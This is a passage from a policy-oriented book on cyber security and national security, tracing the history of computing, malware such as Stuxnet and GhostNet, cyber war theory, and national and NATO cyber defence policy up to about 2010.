traditional military attack. In 2007, for example, it was reported that a cyber attack preceded the Israeli air force’s destruction of an alleged Syrian nuclear reactor.18 Military leaders, by virtue of their profession, should expect to receive Denial of Ser- vice (DoS) attacks against their network infrastructure. As early as the 1999 Kosovo war, unknown hackers attempted to disrupt NATO military operations via the Inter- net and claimed minor victories.19 In future conflicts, DoS attacks may encompass common network “flooding” techniques, the physical destruction of computer hard- ware, the use of electromagnetic interference,20 and more. Terrorists do not possess the unqualified nation-state backing that militaries enjoy. As a consequence, they may still believe that the Internet poses more of a danger than an opportunity. Forensic examination of captured hard drives proves that terrorists have studied computer hacking,21 and Western economies are a logical target. For example, ten- sion in the Middle East is now always accompanied by cyber attacks. During the 2006 war between Israel and Gaza, pro-Palestinian hackers successfully denied ser- vice to around 700 Israeli Internet domains.22 But a long-term, economic threat from cyber terrorists may be illogical. In a global- ized, interconnected world, a cooperative nation-state would only seem to be hurt- ing itself, and a terrorist group may crave a higher level of shock and media atten- 17 Lewis, 2002. 18 Fulghum et al, 2007. 19 Verton, 1999; “Yugoslavia...” 1999. 20 Designed to destroy electronics via current or voltage surges. 21 “Terrorists...” 2006. 22 Stoil & Goldstein, 2006. 15 Cyber Security and National Security tion than a cyber attack could create.23 Former U.S. Director of National Intelligence (DNI) Mike McConnell has argued that a possible exception could be a cyber attack on the public’s confidence in the financial system itself, specifically in the security and supply of money.24 All things considered, cyber attacks appear capable of having strategic consequenc- es; therefore, they must be taken seriously by national security leadership. At the national and organizational levels, a good starting point is methodical risk manage- ment, including objective threat evaluation and careful resource allocation. The goal is not perfection, but the application of due diligence and common sense. The pertinent questions include: • What is our critical infrastructure? • Is it dependent on information technology? • Is it connected to the Internet? • Would its loss constitute a national security threat? • Can we secure it or, failing that, take it off-line? Objectivity is key. Cyber attacks receive enormous media hype, in part because they involve the use of arcane tools and tactics that can be difficult to understand for those without a formal education in computer science or information technology. As dependence on IT and the Internet grow, governments should make proportional investments in network security, incident response, technical training, and interna- tional collaboration. However, because cyber security has evolved from a technical discipline to a strate- gic concept, and because cyber attacks can affect national security at the strategic level, world leaders must look beyond the tactical arena. The quest for strategic cyber security involves marshaling all of the resources of a nation-state. Therefore, the goal of this research is to evaluate nation-state cyber attack mitiga- tion strategies. To support its arguments and conclusions, the author employs the Decision Making Trial and Evaluation Laboratory (DEMATEL). 23 Lewis, 2010. CSIS’s Lewis recently stated: “It remains intriguing and suggestive that [terrorists] have not launched a cyber attack. This may reflect a lack of capability, a decision that cyber weapons do not produce the violent results terrorists crave, or a preoccupation with other activities. Eventually terrorists will use cyber attacks, as they become easier to launch...” 24 “Cyber War...” 2009. 16 INTRODUCTION The Nature and Scope of this Book Today, world leaders fear that cyber terrorism and cyber warfare pose a new and perhaps serious threat to national security – the Internet is a powerful resource, modern society is increasingly dependent upon it, and cyber attackers have demon- strated the capability to manipulate and disrupt the Internet for a wide variety of political and military purposes. There is a clear need for national security planners to prepare cyber defenses at both the tactical and strategic levels. The goal of this research is to help decision makers with the latter – to choose the most efficient courses of action to take at the strategic level in order to defend their national interests in cyberspace. Beyond its Introduction and Conclusion, this book has three primary parts. First, it explores the changing nature of cyber security, tracing its evolution from a technical discipline to a strategic concept. Second, it evaluates four approaches to improving the cyber security posture of a nation-state – Internet Protocol version 6 (IPv6), the application of Sun Tzu’s Art of War to cyber conflict, cyber attack deterrence, and cyber arms control. Third, it employs the Decision Making Trial and Evaluation Laboratory (DEMATEL) to analyze the key concepts covered and to prioritize the four cyber security strategies. The four cyber attack mitigation strategies – IPv6, Art of War, deterrence and arms control – fall into several categories. IPv6 is a technical solution. Art of War is mili- tary. The third and fourth strategies are hybrid: deterrence is a mix of military and political considerations; arms control is a political/technical approach. There are significant limitations to this research. Cyberspace is complex, dynamic, and constantly evolving. National security planning involves a wide array of fallible human perceptions and at times irrational decision-making at both the national and international levels. At a minimum, strategic cyber security demands a holistic investigation, subject to the particular context of different nations. These complexi- ties serve to limit the aspiration of this research to an initial policy evaluation that addresses the needs of a theoretical nation-state. Data collection for this research consisted primarily of peer-reviewed scientific lit- erature and the author’s direct observation of events such as the 2010 Cooperative Cyber Defence Centre of Excellence/Swedish National Defence College cyber defense exercise (CDX), “Baltic Cyber Shield.” Data analysis is almost exclusively that of the author,25 whose personal experience as a cyber security analyst spans over a decade. 25 Three chapters were co-written by colleagues with a very strong technical background. 17 Cyber Security and National Security The validation of this research rests on peer-review, to which every chapter has been subjected. It encompasses fourteen articles related to strategic cyber security, eleven written solely by the author, six of which are listed in the Thomson Reuters ISI Web of Knowledge. The author is ideally placed to conduct this research. Since 2007, he has been a Sci- entist at the North Atlantic Treaty Organization (NATO) Cooperative Cyber Defence Centre of Excellence in Tallinn, Estonia.26 Previously, he was the Division Chief for Cyber Analysis at the Naval Criminal Investigative Service (NCIS) in Washington, DC. Research Outline This book seeks to help nation-states mitigate strategic-level cyber attacks. It has five parts. I. Introduction: Cyber Security and National Security II. Birth of a Concept: Strategic Cyber Security III. Nation-State Cyber Attack Mitigation Strategies IV. Data Analysis and Research Results V. Conclusion: Research Contributions Part II explores the concept of “strategic” cyber security, moving beyond its tacti- cal, technical aspects – such as how to configure a firewall or monitor an intrusion detection system – to defending the cyberspace of a nation-state. It provides the foundation and rationale for Parts III and IV, and has three chapters. 1. Cyber Security: A Short History 2. Cyber Security: A Short History 3. Cyber Security: A Technical Primer 4. Cyber Security: Real World Impact Part III of this book asks four research questions, which highlight four likely stra- tegic approaches that nations will adopt to mitigate the cyber attack threat and to improve their national cyber security posture. 5. The Next-Generation Internet: can Internet Protocol version 6 (IPv6) increase strategic cyber security? 26 The Centre’s vision is to be NATO’s primary source of expertise in the field of cooperative cyber defense research. As of mid-2011, the Centre employed cyber defense specialists from nine different Sponsoring Nations. 18 INTRODUCTION 6. Sun Tzu’s Art of War: can the world’s best military doctrine encompass cyber warfare? 7. Cyber attack deterrence: is it possible to prevent cyber attacks? 8. Cyber arms control: can we limit cyber weapons? Part IV employs the Decision Making Trial and Evaluation Laboratory (DEMATEL) to analyze the key concepts covered in this book and to prioritize the four proposed cyber attack mitigation strategies addressed in Part III. Its goal is to help decision makers choose the most efficient ways to address the challenge of improving cyber security at the strategic level. 9. DEMATEL and Strategic Analysis 10. Key Findings Part V, the Conclusion, summarizes the contributions of this book and provides sug- gestions for future research. 19 Cyber Security: A Short History II. BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY 2. CYBER SECURITY: A SHORT HISTORY Human history is often marked by revolutions in science and technology. During the Industrial Revolution, for example, the steam engine worked miracles for our mus- cles. Standardization and mass production dramatically lowered the cost of manu- factured goods by decreasing the amount of human energy required to make them. We are now in the middle of the Information Revolution. The computer is in effect a steam engine for our brains. It dramatically facilitates the acquisition and validation of knowledge. The primary goal of building the first computers was simple – to cre- ate a machine that could process calculations faster than a human could by hand. In due course, scientists were able to accomplish that and much, much more. Chapter 2 of this book outlines the primary historical events that have transformed cyber security from a technical discipline to a strategic concept. The Power of Computers In 1837, Cambridge University Professor Charles Babbage designed the “Analytical Engine,” a surprisingly modern mechanical computer that was never built because it was about 100 years ahead of its time. Historically, national security considerations have been the prevailing wind behind the development of Information Technology (IT).27 In 1943, the U.S. military com- missioned the world’s first general-purpose electronic computer, the Electronic Nu- merical Integrator and Computer (ENIAC). This collection of 18,000 vacuum tubes was designed to compute ballistic trajectories at 100,000 “pulses” per second, or 100 times faster than a human with a mechanical calculator. ENIAC smashed all expectations, calculating at speeds up to 300,000 times faster than a human. After WWII, cutting-edge computers began to demonstrate their value outside the military realm. UNIVAC I,28 the first commercial computer produced in the United 27 Commercially, companies such as International Business Machines (IBM) had found success in marketing electro-mechanical devices by 1900. 28 The Universal Automatic Computer I had a clock speed of 2.5 MHz, a central memory of 1,000 91-bit words, and a peak rate of 1,000 FLOPS, or about 1/1,000,000th the speed of a CRAY-2. 20 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY States, correctly predicted the results of the 1952 Presidential election based on a sample of just 1%. But the Information Revolution had only just begun. The arrival of the personal com- puter (PC) left a much deeper impact on the Earth. The invention of the microproces- sor, random-access storage, and software of infinite variety allowed anyone to own a “personal mainframe” with demonstrable scientific and engineering capabilities.29 Information Technology (IT) now pervades our lives. In 1965, Gordon Moore cor- rectly predicted that the number of transistors on a computer chip would double every two years.30 There has been similar growth in almost all aspects of informa- tion technology (IT), including the availability of practical encryption, user-friendly hacker tools, and Web-enabled open source intelligence (OSINT). The physical limits of desktop computing are approaching. For example, electronic circuitry may be reaching its minimum physical size, and the maximum rate at which information can move through any computer system may be limited by the finite speed of light. However, the simultaneous rise of “cyberspace” solves this problem. In 2010, there were nearly one billion computers connected directly to the Internet, and over 1.5 billion Internet users on Earth.31 Today, a reliable connection to the Internet is more important than the power of one’s computer and provides infinitely greater utility to the user. The Rise of Malicious Code Together, computers and computer networks offer individuals, organizations, and governments the ability to acquire and exploit information at unprecedented speed. In business, diplomacy, and military might, this translates into a competitive advan- tage, suggesting that brains will beat brawn with increasing frequency over time and that computer resources will play a central role in future human conflict. The original meaning of the term “hacker” was quite positive. It meant a very clever user of technology, specifically someone who modified hardware or software in or- der to stretch its limits, especially to take it beyond where its inventors had intended 29 Miller, 1989. 30 “Moore’s Law...” www.intel.com. 31 These figures are from The World Factbook, published by the Central Intelligence Agency: “Internet hosts” are defined as a computer connected directly to the Internet, either from a hard-wired terminal, or by modem/telephone/satellite, etc. 21 Cyber Security: A Short History it to go. Over time, however, the criminalization of hacking has led to a decay of the word’s original meaning. Regardless of a hacker’s intentions, there are three basic forms of cyber attack32 that national security planners should keep in mind. The first type of attack targets the confidentiality of data. It encompasses any un- authorized acquisition of information, including via “traffic analysis,” in which an attacker infers communication content merely by observing communication pat- terns. Because global network connectivity is currently well ahead of global and local network security, it can be easy for hackers to steal enormous amounts of sensitive information. For example, in 2009 a Canadian research group called Information Warfare Moni- tor revealed the existence of “GhostNet,” a cyber espionage network of over 1,000 compromised computers in 103 countries that targeted diplomatic, political, eco- nomic, and military information.33 The second type of attack targets the integrity of information. This includes the “sabotage” of data for criminal, political, or military purposes. Cyber criminals have been known to encrypt the data on a victim’s hard drive and then demand a ransom payment in exchange for the decryption key. Some countries with poor human rights records have been accused of editing the email and blog entries of their citizens.34 The third type of attack targets the availability of computers or information resourc- es. The goal here is to prevent authorized users from gaining access to the systems or data they require to perform certain tasks. This is commonly referred to as a denial-of-service (DoS) and encompasses a wide range of malware, network traffic, or physical attacks on computers, databases, and the networks that connect them. In 2001, “MafiaBoy,” a 15 year-old student from Montreal, conducted a successful DoS attack against some of the world’s biggest online companies, likely causing over $1 billion in financial damage.35 In 2007, Syrian air defense was reportedly disabled by a cyber attack moments before the Israeli air force demolished an alleged nuclear reactor.36 And the Burmese government, during a government crackdown on politi- cal protestors, completely severed its Internet connection to the outside world.37 32 The term “cyber” is used generically to describe computers, networks, and digital information. 33 “Tracking GhostNet...” 2009. 34 Geers, 2007a. 35 Verton, 2002. 36 Fulghum et al, 2007. 37 Tran, 2007. 22 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY If computer users were isolated from one another, computer security management would be straightforward and rely primarily on personnel background checks and padlocks. But the benefits of networking are too great to ignore. Modern organiza- tions require Internet connectivity. The trick is to find the right balance between functionality, performance, and secu- rity. It is impossible to optimize the equilibrium with respect to all attacks. Before a military operation, if every soldier knew every detail of the plan, morale and readi- ness might improve, but it would be far easier for the enemy to become witting as well. On the other hand, when too few soldiers are in the know, the odds of success are lower.38 As during WW II, the national security community continued to lead the way. By 1967, the U.S. military had configured an IBM System/360 network with discrete levels of clearance, compartments, need-to-know, and centralized authority control. In the civilian world, however, system administrators could not prevent users from reading the data of another user until 1970. And even then, the administrative goal was to prevent accidental data corruption, not to protect users from one another.39 As Internet connectivity grew, malicious users and computer hackers were able to conduct increasingly asymmetric attacks. In theory, an attacker can target all Inter- net-connected computers simultaneously, with an attack that travels at near light- speed. The strength of the Internet – an accessible, collaborative framework based on common technologies and protocols – unfortunately makes it vulnerable to novel attacks and susceptible to swift and massive damage. The notion of a computer worm or virus dates to 1949, when the mathematician John von Neumann proposed “self-replicating automata.” However, such malware remained in an experimental stage40 until the early 1990s.41 Hackers wrote viral programs such as the Creeper worm, which infected ARPANET42 in 1971 and a 1988 Internet virus that exploited weak passwords in SUN and VAX computers. However, these programs did not yet attempt to steal or destroy data.43 38 Saydjari, 2004. 39 Saltzer & Schroeder, 1975. 40 These were primarily boot-sector viruses that targeted MS DOS. 41 Chen & Robert, 2004. 42 The U.S. Advanced Research Projects Agency Network. 43 Eichin & Rochlis, 1989. 23 Cyber Security: A Short History During the 1990s, as the number of Internet users grew exponentially, there was an explosion of malware, in both quantity and quality. In 2003, a DARPA44-funded study45 categorized the known Internet worms46 by attacker motivation: • experimental curiosity (Morris/ILoveYou), • non-existent or non-functional payload (Morris/Slammer), • backdoor creation for remote control (Code Red II), • HTML proxy, spam relay, phishing (Sobig), • DoS (Code Red/Yaha), • Distributed DoS (Stacheldraht), • criminal data collection, espionage (SirCam), • data damage (Chernobyl/Klez), and • political protest (Yaha). Clearly, the goal of computer hacking is limited only by the attacker’s imagination. The DARPA study speculated that future worms could facilitate human surveillance, commercial advantage, the management of distributed malware, terrorist recon- naissance, and even the manipulation of critical infrastructures in support of cyber war objectives. Why are hackers so successful, and are we improving our defenses against them? Fortunately, an enormous amount of attention has been drawn to cyber security. For example, in 2002, Microsoft advertised its Trustworthy Computing Initiative, de- claring that security would henceforth be at the forefront of Window’s development. 44 The U.S. Defense Advanced Research Projects Agency. 45 Five worm characteristics were analyzed: target discovery, method of transmission, code activation, payload, and attacker motivation. Motivation is normally learned by studying the payload, or the non- propagation code, of malware. 46 A computer worm is a program that self-propagates across a network, exploiting security or policy flaws in widely-used services. Viruses typically infect non-mobile files and normally require some user action to move them across a network. Thus the propagation rate of a worm is typically much faster than with a virus. 24 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY Unfortunately, many common computer vulnerabilities are of a persistent nature.47 These include: • the high cost of producing quality software,48 • technical challenges associated with software patch deployment, • susceptibility of the commonly-used C/C++ languages to buffer overflows and code-injection,49 • use of administrator rights by common system and user programs,50 and • the prevalence of “monoculture” computing environments.51 The computer security problem space is both broad and deep. In terms of quantity, in the single month of May 2009, Kaspersky Lab identified 42,520 unique samples of possible malware on its clients’ computers. In terms of quality, the cyber defense community is currently analyzing the most sophisticated piece of malware yet found – Stuxnet.52 This worm targeted national critical infrastructures, specifically the SCADA53 systems used to manage major in- dustrial installations such as power grids and the Programmable Logic Controllers (PLCs) used to control devices such as pumps and valves. Stuxnet’s propagation strategy is a wonder to behold. It exploits at least four zero- day54 vulnerabilities and employs two stolen digital certificates.55 It targets “air- gapped”56 networks via removable USB drives and is smart enough to attempt its exploits only when connected to a SCADA environment. Finally, in 2010, most of the 47 Weaver et al, 2003. 48 Unfortunately, even the most robust and scrutinized software, such as OpenSSH, OpenSSL and Apache, have been shown to contain major security vulnerabilities. 49 These refer to attacks that target ostensibly inaccessible computer memory space and the exploitation of flaws in a computer program to insert unauthorized hacker code. 50 Hackers take advantage of the fact that malicious code normally runs at the level of the user who executes it. This is why one should never surf the Web from an Administrator account. 51 The Windows operating system, for example, commands about 90% of the desktop market share. 52 Stuxnet was discovered by a Belarusian anti-virus firm in June 2010, but the worm had been active on the Internet, undetected, for at least one year. 53 Supervisory Command and Data Acquisition. 54 Zero-day vulnerabilities are computer weaknesses that are unknown to the cyber defense community, which a witting attacker may exploit at will. 55 Digital certificates contain sensitive and hard-to-acquire cryptographic information that is used to verify identities via the Internet. 56 Air-gapped networks are not physically connected to the Internet. 25 Cyber Security: A Short History infected machines were located in a country of high interest to intelligence agencies around the world – Iran.57 A strategic challenge for cyber defense is that the Internet evolves so quickly it is impossible for any organization to master all of the latest developments. Over time, attackers have subverted an ever-increasing number of operating systems, applica- tions, and communications protocols. Defenders simply have too much technical ground to cover, which is to a hacker’s advantage and places a premium on defen- sive creativity, good intelligence, and some level of automated attack detection and response. Lone Hacker to Cyber Army Information operations are surely as old as warfare itself. A well-known example from the 20th century is the spectacular effort by the Allies to convince the Ger- man military leadership that the D-Day invasion would take place at Pas-de-Calais instead of Normandy.58 The first mention of a forthcoming “information war” in cyberspace is attributed to Thomas Rona, the author of a 1976 Boeing Corporation research paper entitled “Weapon Systems and Information War.”59 Rona perceived that computer networks were both an asset and a liability for any organization. Once a mission came to rely on the proper functioning of IT for success, computer systems would be among the first targets in war. Rona argued that all information flows within any command- and-control system are vulnerable to jamming, overloading, or spoofing by an ad- versary.60 In 1993, a widely-cited U.S. Naval Postgraduate School (NPS) article examined the historical aspects of “cyberwar.” Its authors argued that the Information Revolu- tion would change not only how wars are fought, but even why wars are fought. IT offered the world such increased organizational efficiency and improved decision- making that traditional hierarchies and political systems would be forced to evolve or die, and even international borders would have to be redrawn. For militaries, IT-enhanced situational awareness was compared to the 13th cen- tury Mongol army’s use of “arrow riders” on horseback to keep national leadership informed of distant battlefield developments with astonishing speed and to the ad- vantage a chess player would have over a blindfolded opponent. Cyberwar could be 57 “Stuxnet...” 2010. 58 Churchman, 2005. 59 Rona, 1976. 60 Van Creveld, 1987. 26 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY to the 21st century what blitzkrieg or “lightning war” was to the 20th century, and a standard military goal will be to turn the balance of information control in one’s favor, especially if the balance of conventional forces is not. The NPS professors envisioned two levels of Internet conflict: a “netwar” of diploma- cy and propaganda, and “cyberwar,” which would encompass all military operations designed to attack an adversary’s critical IT systems.61 In 2001, computer scientists from the Carnegie Mellon University Computer Emer- gency Response Team (CERT) wrote an article for the NATO Review, “Countering Cyber War,” which argued that cyber attacks would play an increasingly strategic role in warfare and that NATO must immediately begin to plan for the defense of cyberspace. The CERT team described three levels of cyber warfare. The first is a simple adjunct to traditional military operations to gain information superiority, such as by target- ing an air defense system. However, because military functions such as early warn- ing have an intrinsic strategic value to a nation, a successful cyber attack against air defense could lead to strategic losses. The second level is “limited” cyber war. Here, civilian Internet infrastructure be- comes part of the battleground, and the target list includes some civilian enterprises. The third and most serious level is “unrestricted” cyber war. Here, an adversary seeks to cause maximum damage to civilian infrastructure in order to rupture the “social fabric” of a nation. Air-traffic control, stock exchange, emergency services, and power generation systems62 could be targets. The goal is as much physical dam- age and as many civilian casualties as possible.63 In 2001, James Adams revealed in the pages of Foreign Affairs that the U.S. Depart- ment of Defense had in fact put cyber war theories to a real-world test in a classi- fied 1997 Red Team exercise codenamed “Eligible Receiver.” Thirty-five U.S. National Security Agency (NSA) personnel, simulating North Korean hackers, used a variety of cyber and information warfare (IW) tools and tactics, including the transmission of fabricated military orders and news reports, to attack the U.S. Navy’s Pacific Com- mand from cyberspace. The Red Team was so successful that the Navy’s “human command-and-control system” was paralyzed by mistrust, and “nobody ... from the president on down, could believe anything.”64 61 Arquilla & Ronfeldt, 1993. 62 Successful attacks on electricity grids have subsequent, unforeseeable effects on an economy because most infrastructures, including computer systems, rely on electricity to function. 63 Shimeall et al, 2001. 64 Adams, 2001. 27 Cyber Security: A Short History Nonetheless, two important IW thinkers remained dubious. Georgetown University Professor Dorothy Denning agreed that “hacktivism”65 had begun to influence politi- cal discourse, but argued that there had not been a single verifiable case of cyber terrorism, and believed that no cyber attack had yet caused a human casualty.66 Furthermore, James Lewis of the Center for Strategic and International Studies (CSIS) opined that cyber attacks were easy to hype because cyber security is an arcane discipline that is difficult for non-experts to understand. He argued that vul- nerabilities in computers did not equate to vulnerabilities in critical infrastructures, and that terrorists would continue to prefer traditional physical attacks because the likelihood of real-world damage was much higher. While cyber attacks were a grow- ing business problem, they did not yet pose a threat to national security.67 One decade later, it is possible that some militaries have crossed that threshold. A 2009 report on the cyber warfare capabilities of the People’s Republic of China (PRC) described a highly-networked force that can now communicate with ease across military services and through chains of command. Furthermore, each mili- tary unit has a clear, offensive cyber mission in times of both war and peace. In peacetime, strategic intelligence is gathered via cyber espionage to help win future wars.68 In war, a broad array of computer network operations (CNO), electronic war- fare (EW), and kinetic strikes will be used to achieve information superiority over an adversary,69 especially during the early or preemptive-strike phases of a conflict.70 Is cyber espionage alone capable of changing the balance of power among nations? By 1999, the U.S. Energy Department had discovered hundreds of attacks on its computer systems from outside the United States and determined that Chinese hacking in particular posed an “acute” intelligence threat to U.S. nuclear weapons laboratories.71 The U.S. Joint Strike Fighter (JSF) is the most expensive weapons program in world history. Unknown hackers have stolen terabytes of JSF design and electronics data72 65 Hacktivism is a combination of hacking and political activism. 66 Denning, 2002. 67 Lewis, 2002. 68 As evidence of state-sponsorship, the report cites sophisticated hacking techniques and the collection of military and China-specific policy information that is of little commercial value. 69 One goal would be to create exploitable “blind spots” in an adversary’s decision cycle that could, for example, lead to the delay of adversary military deployments. 70 Krekel, 2009. 71 Gerth & Risen, 1999. 72 Officials believed that the jet’s most closely-held secrets, which pertained to flight controls and sensors, were safe because they had been stored on computers not connected to the Internet. 28 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY in a mammoth case of cyber espionage that has revealed a government’s vulner- ability to the security posture of its civilian contractors and the exasperating task of conducting a cyber battle damage assessment.73 Based on the IP addresses used and other known digital fingerprints, the JSF attacks were believed with a high level of certainty to come from the Chinese military.74 From a strategic perspective, the cyber threat that hits closest to home and may eventually spur international agreements to mitigate the hacker threat relates to critical infrastructure protection (CIP). The potential target list seems endless: air traffic,75 financial sector,76 national elections,77 water,78 even electricity.79 Trends sug- gest that all of the above are increasingly connected to the Internet, and that custom IT systems are over time replaced with less expensive Windows and UNIX systems that are not only easier to use, but easier to hack.80 Have real-world attacks on national critical infrastructures already taken place? In May 2009, President Obama made a dramatic announcement: “Cyber attacks have plunged entire cities into darkness.”81 Investigative journalists subsequently concluded that the attacks took place in Brazil in 2005 and 2007, affected millions of civilians, and that the source of the attacks is still unknown.82 National Security Planning Scientists began to warn the world about the danger of computer hacking shortly after WW II. Technical precautions, at least within the national security community, were implemented by the 1960s. 73 The hackers encrypted the JSF data they found before removing it from the network, so it was nearly impossible for investigators to determine exactly what had been stolen. JSF electronics run over seven million lines of computer code, more than triple currently used in the top Air Force fighter, so the attackers have potentially found many vulnerabilities to exploit in the future. 74 Gorman et al, 2009. 75 Gorman, 2009a. 76 Wagner, 2010. After the Dow Jones surprisingly plunged almost 1,000 points, White House adviser John Brennan stated that officials had considered but found no evidence of a malicious cyber attack. 77 Orr, 2007. In 2007, California held a hearing on the security of its touch-screen voting machines, in which a Red Team leader testified that the voting system was vulnerable to attack. 78 Preimesberger, 2006. In 2006, the Sandia National Laboratories Red Team conducted a network vulnerability assessment of U.S. water distribution plants. 79 Meserve, 2007. Department of Homeland Security (DHS) officials briefed CNN that Idaho National Laboratory (INL) researchers had hacked into a replica of a power plant’s control system and changed the operating cycle of a generator, causing it to self-destruct. 80 Preimesberger, 2006. 81 “Remarks by the President...” 2009. 82 “Cyber War...” 2009. 29 Cyber Security: A Short History As the size and importance of the Internet grew, however, there was a need for computer security to move from a tactical to a strategic level. And the driving force for national policy was the realization that a combination of persistent computer vulnerabilities and worldwide connectivity had placed national critical infrastruc- tures at risk. In 1997, Bill Clinton established the President’s Commission on Critical Infrastruc- ture Protection (PCCIP). Its final report, Critical Foundations: Protecting America’s Infrastructures, identified eight sectors of the U.S. economy that held strategic se- curity value: telecommunications, electric power, gas and oil, water, transportation, banking and finance, emergency services, and government continuity. PCCIP recognized not only the nation’s dependence on its critical infrastructure (CI), but also the dependence of modern CI on IT systems. Further, it cited “pervasive” vulnerabilities that were open to attack by a “wide spectrum” of potential threats and adversaries. Because the cyber attack threat to CI is strategic in scope, the national response must be equal to the task: public awareness, investment in education, scientific re- search, the development of cyber law, and international cooperation. New agencies and economic “sector coordinators” were also created,83 but PCCIP emphasized that no single individual or organization could be responsible for CIP because critical infrastructures are collective assets that the government and private sector must manage together.84 On December 4, 1998, Russia sponsored United Nations (UN) General Assembly Resolution 53/70, “Developments in the field of information and telecommunica- tions in the context of international security.” It stated that science and technology play an important role in international security, and that while modern information and communication technology (ICT) offers civilization the “broadest positive op- portunities,” ICT was nonetheless vulnerable to misuse by criminals and terrorists. UN member states were therefore requested to inform the Secretary-General of their concerns regarding ICT misuse and offer proposals to enhance its security in the future. The UN adopted Resolution 53/70 on January 4, 1999.85 The most successful international cyber security agreement to date – the Council of Europe Convention on Cybercrime – opened for signature in 2001. This treaty takes 83 PCCIP led to many developments relative to cyber security, including Presidential Decision Directive 63 (PDD-63), National Infrastructure Protection Center (NIPC), Critical Infrastructure Assurance Office (CIAO), National Infrastructure Assurance Council (NIAC), Information Sharing and Assessment Centers (ISACs), and DoD Joint Task Force—Computer Network Defense (JTF-CND). 84 Neumann, 1998. 85 “53/70...” 1999. 30 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY aim at copyright infringement, fraud, child pornography and violations of network security policy. It offers guidelines to law enforcement regarding data interception and the search of computer networks. Its ultimate goal is a common policy on cyber crime worldwide via national legislation and international cooperation. Currently, the Convention has forty-seven national signatories, thirty ratifications, and is the primary legal instrument available to nation-states with respect to cyber security.86 At the level of national security, the most visible changes in cyber defense strat- egy have taken place within the U.S. military. A turning point occurred in 2008, when unknown hackers successfully compromised classified military systems in the “most significant breach” of U.S. military computers ever. U.S. Deputy Secretary of Defense William J. Lynn wrote in Foreign Affairs that ad- versaries now have the power to disrupt critical U.S. information infrastructure, and that the asymmetric nature of hacking means that a “dozen” computer program- mers can pose a national security threat. Over the long term, Lynn believed that computer hacking can lead to the loss of enough intellectual property to deprive a nation of its economic vitality. The most tangible U.S. response has been the creation of its military Cyber Com- mand in 2010. USCYBERCOM has three primary missions: computer network de- fense, the coordination of national cyber warfare resources, and cyber security liaison with domestic and foreign partners. Its first mission, defense, relies on a combination of traditional best practices in computer security and classified intel- ligence threat information, to create a unique, “active” U.S. cyber defense posture.87 The quest for strategic cyber defense took its most recent step forward in Lisbon, Portugal, in November 2010, where twenty-eight national leaders from the world’s foremost political and military alliance published a new “Strategic Concept” for the North Atlantic Treaty Organization (NATO). This document clearly illustrates the rapid rise in the perceived connection between computer security and national security. The previous Strategic Concept, written in 1999, did not contain a single mention of computers, networks, or hackers. The new document, entitled “Active Engagement, Modern Defence,” describes cyber attacks as “frequent, organized, and costly,” and having now reached a threshold where they threaten “national and Euro-Atlantic prosperity, security and stability.” If NATO hopes to defend the cyber domain, it must improve its ability to prevent, detect, counter and recover from cyber attacks. At a minimum, this requires placing 86 From the Council of Europe Convention on Cybercrime website: http://conventions.coe.int/. 87 Lynn, 2010. 31 Cyber Security: A Short History all NATO bodies under centralized cyber protection, upgrading member state cyber defense capabilities, and coordinating the efforts of national and organizational cy- ber security resources.88 In fact, NATO may be the best place to begin answering the national security chal- lenge posed by cyber attacks. The Internet is now an international asset. As such, threats to it require an international response. As a large group of affluent nations with a shared political and military agenda,89 it is possible that NATO today could deal a significant blow to one of a hacker’s greatest advantages – anonymity.90 More Questions than Answers Although the first modern computer was designed at Cambridge in 1837, in many ways the Information Revolution has just begun. The World Wide Web, for example, is just twenty years old.91 As our use of and dependence on the Internet have grown, however, computer secu- rity has quickly evolved from a purely technical discipline to a geopolitical strategic concept. At the 2010 NATO Summit in Lisbon, twenty-eight world leaders declared that cyber attacks now threaten international prosperity, security, and stability. Moreover, in the future the consequences of a cyber attack may rise because the threat will affect national critical infrastructures of every kind. In our homes, the use of “smart grid” networks is proliferating. And in our militaries, the production of IP-enabled munitions, such as unmanned aircraft, is outpacing that of their manned counterparts, meaning that even warfare is now managed remotely via the Inter- net.92 As national security thinkers attempt to defend their interests in cyberspace, a key to success will be to bridge the gap between cyber strategy and cyber tactics. Goals such as the security of national critical infrastructures and strategies like military deterrence and arms control demand a greater appreciation for the capabilities and challenges of computer scientists, who fight their battles on the front lines of cryp- tography, intrusion detection, reverse engineering, and other highly technical dis- ciplines. 88 “Active Engagement...” 2010. 89 NATO is much larger than its 28 Member Countries. It also encompasses 22 members of the Euro- Atlantic Partnership Council, 7 Mediterranean Dialogue, 4 Istanbul Cooperation Initiative, and 4 Contact Countries. 90 Three areas of obvious collaboration could be in network security, law enforcement and counterintelligence. 91 The Web was conceived at the European Organization for Nuclear Research (CERN) in 1990. 92 Orton, 2009. 32 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY The quest for strategic cyber security began in Cambridge and paused most recently in Lisbon, but for emerging policies to reflect technical realities, policymakers must return to Cambridge. 33 Cyber Security: A Technical Primer 3. CYBER SECURITY: A TECHNICAL PRIMER Chapter 2 demonstrated that cyber security has evolved from a purely technical dis- cipline to a strategic, geopolitical concept that can directly impact national security. Nonetheless, at the tactical level cyber security remains a highly technical discipline that is difficult to understand for those without a formal education in computer sci- ence or information technology. Therefore, before this research examines the real-world impact of cyber attacks and explores strategic threat mitigation strategies, Chapter 3 will introduce the reader to the basics of cyber security analysis, macro-scale hacking, the case-study of Saudi Arabia, and cyber defense exercises. Hopefully, a greater appreciation for the chal- lenges of computer science will help policy makers to bridge the gap between tacti- cal and strategic cyber security thinking. Cyber Security Analysis To introduce the reader to the topic of cyber security analysis, the author will briefly analyze his own personal firewall log.93 Almost everyone today has a personal or “host” firewall installed on his or her com- puter. It protects both the computer and its user from unwanted network activ- ity. Technically speaking, it accepts or rejects incoming data “packets.” Professional computer security analysts examine the log files, or recorded events, of firewalls and other computing devices for signs of suspicious activity. Most of the recorded network traffic is non-malicious even if it may be unsolicited and unwanted. For example, an Internet Service Provider (ISP) may “scan” its cli- ents’ computers for policy violations such as hosting an unauthorized Web server. Businesses go to extraordinary and sometimes unethical lengths to gather in-depth information about computers and their users, such as which operating system they use and what type of movies they prefer, for advertising purposes. Firewall logs can be viewed in many different ways. A security analyst can sort them by country, for example, to identify blocked traffic by world geography.94 93 This analysis is of a Zone Alarm personal firewall log that contains 12,700 record entries from 31 